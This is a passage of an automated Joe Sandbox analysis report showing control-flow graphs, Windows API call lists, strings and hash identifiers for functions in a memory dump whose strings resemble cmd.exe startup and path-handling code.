                                                                                                                                                                        control_flow_graph 1142 7ff6e9432978-7ff6e94329b6 1143 7ff6e94329b9-7ff6e94329c1 1142->1143 1143->1143 1144 7ff6e94329c3-7ff6e94329c5 1143->1144 1145 7ff6e94329cb-7ff6e94329cf 1144->1145 1146 7ff6e943e441 1144->1146 1147 7ff6e94329d2-7ff6e94329da 1145->1147 1148 7ff6e94329dc-7ff6e94329e1 1147->1148 1149 7ff6e9432a1e-7ff6e9432a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff6e94329e3-7ff6e94329eb 1148->1152 1150 7ff6e943e435-7ff6e943e439 1149->1150 1151 7ff6e9432a44-7ff6e9432a5c FindClose 1149->1151 1150->1146 1153 7ff6e9432a62-7ff6e9432a6e 1151->1153 1154 7ff6e9432ae3-7ff6e9432ae5 1151->1154 1152->1147 1155 7ff6e94329ed-7ff6e9432a1c call 7ff6e9438f80 1152->1155 1156 7ff6e9432a70-7ff6e9432a78 1153->1156 1157 7ff6e943e3f7-7ff6e943e3ff 1154->1157 1158 7ff6e9432aeb-7ff6e9432b10 _wcsnicmp 1154->1158 1156->1156 1161 7ff6e9432a7a-7ff6e9432a8d 1156->1161 1158->1153 1162 7ff6e9432b16-7ff6e943e3f1 _wcsicmp 1158->1162 1161->1146 1163 7ff6e9432a93-7ff6e9432a97 1161->1163 1162->1153 1162->1157 1165 7ff6e9432a9d-7ff6e9432ade memmove call 7ff6e94313e0 1163->1165 1166 7ff6e943e404-7ff6e943e407 1163->1166 1165->1152 1167 7ff6e943e40b-7ff6e943e413 1166->1167 1167->1167 1169 7ff6e943e415-7ff6e943e42b memmove 1167->1169 1169->1150
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                        • Instruction ID: 7a724d016c5e05420fc9df98c0e36f57778de9691155a25a8de97433ebbc7cb8
                                                                                                                                                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                        • Instruction Fuzzy Hash: 5351E123B19682C6EA30DF35A5483BAA290BF54BA4F445230DE6E876D1DF3DE449C709
                                                                                                                                                                        Function 00007FF6E9434D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 643 7ff6e9434d5c-7ff6e9434e4b InitializeCriticalSection call 7ff6e94358e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6e9430580 call 7ff6e9434a14 call 7ff6e9434ad0 call 7ff6e9435554 GetCommandLineW 654 7ff6e9434e4d-7ff6e9434e54 643->654 654->654 655 7ff6e9434e56-7ff6e9434e61 654->655 656 7ff6e9434e67-7ff6e9434e7b call 7ff6e9432e44 655->656 657 7ff6e94351cf-7ff6e94351e3 call 7ff6e9423278 call 7ff6e9434c1c 655->657 662 7ff6e94351ba-7ff6e94351ce call 7ff6e9423278 call 7ff6e9434c1c 656->662 663 7ff6e9434e81-7ff6e9434ec3 GetCommandLineW call 7ff6e94313e0 call 7ff6e942ca40 656->663 662->657 663->662 674 7ff6e9434ec9-7ff6e9434ee8 call 7ff6e943417c call 7ff6e9432394 663->674 678 7ff6e9434eed-7ff6e9434ef5 674->678 678->678 679 7ff6e9434ef7-7ff6e9434f1f call 7ff6e942aa54 678->679 682 7ff6e9434f21-7ff6e9434f30 679->682 683 7ff6e9434f95-7ff6e9434fee GetConsoleOutputCP GetCPInfo call 7ff6e94351ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff6e9434f32-7ff6e9434f39 682->684 689 7ff6e9434ff0-7ff6e9435006 GetConsoleTitleW 683->689 690 7ff6e9435012-7ff6e9435018 683->690 684->683 686 7ff6e9434f3b-7ff6e9434f77 call 7ff6e9423278 GetWindowsDirectoryW 684->686 696 7ff6e9434f7d-7ff6e9434f90 call 7ff6e9433c24 686->696 697 7ff6e94351b1-7ff6e94351b9 call 7ff6e9434c1c 686->697 689->690 694 7ff6e9435008-7ff6e943500f 689->694 691 7ff6e943507a-7ff6e943507e 690->691 692 7ff6e943501a-7ff6e9435024 call 7ff6e9433578 690->692 698 7ff6e94350eb-7ff6e9435161 GetModuleHandleW GetProcAddress * 3 691->698 699 7ff6e9435080-7ff6e94350b3 call 7ff6e944b89c call 7ff6e942586c call 7ff6e9423240 call 7ff6e9433448 691->699 692->691 706 7ff6e9435026-7ff6e9435030 692->706 694->690 696->683 697->662 704 7ff6e943516f 698->704 705 7ff6e9435163-7ff6e9435167 698->705 724 7ff6e94350b5-7ff6e94350d0 call 7ff6e9433448 * 2 699->724 725 7ff6e94350d2-7ff6e94350d7 call 7ff6e9423278 699->725 710 7ff6e9435172-7ff6e94351af free call 7ff6e9438f80 704->710 705->704 709 7ff6e9435169-7ff6e943516d 705->709 712 7ff6e9435075 call 7ff6e944cff0 706->712 713 7ff6e9435032-7ff6e9435059 GetStdHandle GetConsoleScreenBufferInfo 706->713 709->704 709->710 712->691 716 7ff6e9435069-7ff6e9435073 713->716 717 7ff6e943505b-7ff6e9435067 713->717 716->691 716->712 717->691 729 7ff6e94350dc-7ff6e94350e6 GlobalFree 724->729 725->729 729->698
                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434D9A
                                                                                                                                                                          • Part of subcall function 00007FF6E94358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6E944C6DB), ref: 00007FF6E94358EF
                                                                                                                                                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DBB
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9434DCA
                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434DE0
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9434DEE
                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E04
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430589
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E943059E
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305AF
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E94305C5
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E94305EF
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: GetConsoleMode.KERNELBASE ref: 00007FF6E9430605
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: _get_osfhandle.MSVCRT ref: 00007FF6E9430632
                                                                                                                                                                          • Part of subcall function 00007FF6E9430580: SetConsoleMode.KERNELBASE ref: 00007FF6E9430647
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
                                                                                                                                                                          • Part of subcall function 00007FF6E9434AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
                                                                                                                                                                          • Part of subcall function 00007FF6E9434AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6E9434E35), ref: 00007FF6E94355DA
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435623
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435667
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E94356BE
                                                                                                                                                                          • Part of subcall function 00007FF6E9435554: RegQueryValueExW.KERNELBASE ref: 00007FF6E9435702
                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E35
                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434E81
                                                                                                                                                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F69
                                                                                                                                                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434F95
                                                                                                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FB0
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FC1
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FD8
                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9434FF8
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435037
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943504B
                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350DF
                                                                                                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E94350F2
                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943510F
                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435130
                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E943514A
                                                                                                                                                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6E9435175
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                        • API String ID: 1049357271-3021193919
                                                                                                                                                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction ID: a5e03e501005a527bfbbdda5d1ec8130c2024aa10fc9089661f826422e029ff3
                                                                                                                                                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 56C14263A08A46D6EB14DF61A8543B977A0FF89B91F448134D90EC77A1DF3EA44DC30A
                                                                                                                                                                        Function 00007FF6E9433C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 732 7ff6e9433c24-7ff6e9433c61 733 7ff6e9433c67-7ff6e9433c99 call 7ff6e942af14 call 7ff6e942ca40 732->733 734 7ff6e943ec5a-7ff6e943ec5f 732->734 743 7ff6e943ec97-7ff6e943eca1 call 7ff6e943855c 733->743 744 7ff6e9433c9f-7ff6e9433cb2 call 7ff6e942b900 733->744 734->733 736 7ff6e943ec65-7ff6e943ec6a 734->736 738 7ff6e943412e-7ff6e943415b call 7ff6e9438f80 736->738 744->743 749 7ff6e9433cb8-7ff6e9433cbc 744->749 750 7ff6e9433cbf-7ff6e9433cc7 749->750 750->750 751 7ff6e9433cc9-7ff6e9433ccd 750->751 752 7ff6e9433cd2-7ff6e9433cd8 751->752 753 7ff6e9433cda-7ff6e9433cdf 752->753 754 7ff6e9433ce5-7ff6e9433d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff6e9433faa-7ff6e9433fb3 753->755 756 7ff6e9433fb8 754->756 757 7ff6e9433d68-7ff6e9433d6c 754->757 755->752 759 7ff6e9433fc6-7ff6e9433fec GetLastError call 7ff6e943855c call 7ff6e943a5d6 756->759 757->756 758 7ff6e9433d72-7ff6e9433dcd towupper GetFullPathNameW 757->758 758->759 760 7ff6e9433dd3-7ff6e9433ddd 758->760 762 7ff6e9433ff1-7ff6e9434007 call 7ff6e943855c _local_unwind 759->762 760->762 763 7ff6e9433de3-7ff6e9433dfb 760->763 773 7ff6e943400c-7ff6e9434022 GetLastError 762->773 765 7ff6e9433e01-7ff6e9433e11 763->765 766 7ff6e94340fe-7ff6e9434119 call 7ff6e943855c _local_unwind 763->766 765->766 769 7ff6e9433e17-7ff6e9433e28 765->769 778 7ff6e943411a-7ff6e943412c call 7ff6e942ff70 call 7ff6e943855c 766->778 772 7ff6e9433e2c-7ff6e9433e34 769->772 772->772 775 7ff6e9433e36-7ff6e9433e3f 772->775 776 7ff6e9434028-7ff6e943402b 773->776 777 7ff6e9433e95-7ff6e9433e9c 773->777 779 7ff6e9433e42-7ff6e9433e55 775->779 776->777 780 7ff6e9434031-7ff6e9434047 call 7ff6e943855c _local_unwind 776->780 781 7ff6e9433e9e-7ff6e9433ec2 call 7ff6e9432978 777->781 782 7ff6e9433ecf-7ff6e9433ed3 777->782 778->738 784 7ff6e9433e66-7ff6e9433e8f GetFileAttributesW 779->784 785 7ff6e9433e57-7ff6e9433e60 779->785 804 7ff6e943404c-7ff6e9434062 call 7ff6e943855c _local_unwind 780->804 798 7ff6e9433ec7-7ff6e9433ec9 781->798 788 7ff6e9433f08-7ff6e9433f0b 782->788 789 7ff6e9433ed5-7ff6e9433ef7 GetFileAttributesW 782->789 784->773 784->777 785->784 796 7ff6e9433f9d-7ff6e9433fa5 785->796 794 7ff6e9433f0d-7ff6e9433f11 788->794 795 7ff6e9433f1e-7ff6e9433f40 SetCurrentDirectoryW 788->795 791 7ff6e9434067-7ff6e9434098 GetLastError call 7ff6e943855c _local_unwind 789->791 792 7ff6e9433efd-7ff6e9433f02 789->792 799 7ff6e943409d-7ff6e94340b3 call 7ff6e943855c _local_unwind 791->799 792->788 792->799 801 7ff6e9433f46-7ff6e9433f69 call 7ff6e943498c 794->801 802 7ff6e9433f13-7ff6e9433f1c 794->802 795->801 803 7ff6e94340b8-7ff6e94340de GetLastError call 7ff6e943855c _local_unwind 795->803 796->779 798->782 798->804 799->803 815 7ff6e94340e3-7ff6e94340f9 call 7ff6e943855c _local_unwind 801->815 816 7ff6e9433f6f-7ff6e9433f98 call 7ff6e943417c 801->816 802->795 802->801 803->815 804->791 815->766 816->778
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                        • String ID: :
                                                                                                                                                                        • API String ID: 1809961153-336475711
                                                                                                                                                                        • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                                                                        • Instruction ID: 7e374998180753811e0c53a659e59f4b4d86c053be5e0ee11f8edd63c92f8fa0
                                                                                                                                                                        • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                                                                        • Instruction Fuzzy Hash: C0D12A23609B85D2EA64DF35E4583AAB7A1FF84B40F844135DA4E837A4DF3DE548CB05
                                                                                                                                                                        Function 00007FF6E9432394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 914 7ff6e9432394-7ff6e9432416 memset call 7ff6e942ca40 917 7ff6e943241c-7ff6e9432453 GetModuleFileNameW call 7ff6e943081c 914->917 918 7ff6e943e0d2-7ff6e943e0da call 7ff6e9434c1c 914->918 923 7ff6e9432459-7ff6e9432468 call 7ff6e943081c 917->923 924 7ff6e943e0db-7ff6e943e0ee call 7ff6e943498c 917->924 918->924 929 7ff6e943246e-7ff6e943247d call 7ff6e943081c 923->929 930 7ff6e943e0f4-7ff6e943e107 call 7ff6e943498c 923->930 924->930 935 7ff6e9432516-7ff6e9432529 call 7ff6e943498c 929->935 936 7ff6e9432483-7ff6e9432492 call 7ff6e943081c 929->936 937 7ff6e943e10d-7ff6e943e123 930->937 935->936 936->937 947 7ff6e9432498-7ff6e94324a7 call 7ff6e943081c 936->947 940 7ff6e943e13f-7ff6e943e17a _wcsupr 937->940 941 7ff6e943e125-7ff6e943e139 wcschr 937->941 945 7ff6e943e17c-7ff6e943e17f 940->945 946 7ff6e943e181-7ff6e943e199 wcsrchr 940->946 941->940 944 7ff6e943e27c 941->944 949 7ff6e943e283-7ff6e943e29b call 7ff6e943498c 944->949 948 7ff6e943e19c 945->948 946->948 956 7ff6e94324ad-7ff6e94324c5 call 7ff6e9433c24 947->956 957 7ff6e943e2a1-7ff6e943e2c3 _wcsicmp 947->957 951 7ff6e943e1a0-7ff6e943e1a7 948->951 949->957 951->951 954 7ff6e943e1a9-7ff6e943e1bb 951->954 958 7ff6e943e1c1-7ff6e943e1e6 954->958 959 7ff6e943e264-7ff6e943e277 call 7ff6e9431300 954->959 964 7ff6e94324ca-7ff6e94324db 956->964 962 7ff6e943e1e8-7ff6e943e1f1 958->962 963 7ff6e943e21a 958->963 959->944 968 7ff6e943e201-7ff6e943e210 962->968 969 7ff6e943e1f3-7ff6e943e1f6 962->969 967 7ff6e943e21d-7ff6e943e21f 963->967 965 7ff6e94324e9-7ff6e9432514 call 7ff6e9438f80 964->965 966 7ff6e94324dd-7ff6e94324e4 ??_V@YAXPEAX@Z 964->966 966->965 967->949 971 7ff6e943e221-7ff6e943e228 967->971 968->963 973 7ff6e943e212-7ff6e943e218 968->973 969->968 972 7ff6e943e1f8-7ff6e943e1ff 969->972 975 7ff6e943e22a-7ff6e943e231 971->975 976 7ff6e943e254-7ff6e943e262 971->976 972->968 972->969 973->967 977 7ff6e943e234-7ff6e943e237 975->977 976->944 977->976 978 7ff6e943e239-7ff6e943e242 977->978 978->976 979 7ff6e943e244-7ff6e943e252 978->979 979->976 979->977
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                        • API String ID: 2622545777-4197029667
                                                                                                                                                                        • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                                                                        • Instruction ID: 6466884da9807152d6b97d5d93e782d0e324c227afa02ad116da6a939ad33ced
                                                                                                                                                                        • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                                                                        • Instruction Fuzzy Hash: EF916C63A0A686D6EF25CF71D8583B963A0FF58B84F444135CA0E87795DE3EE508C706
                                                                                                                                                                        Function 00007FF6E9430580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
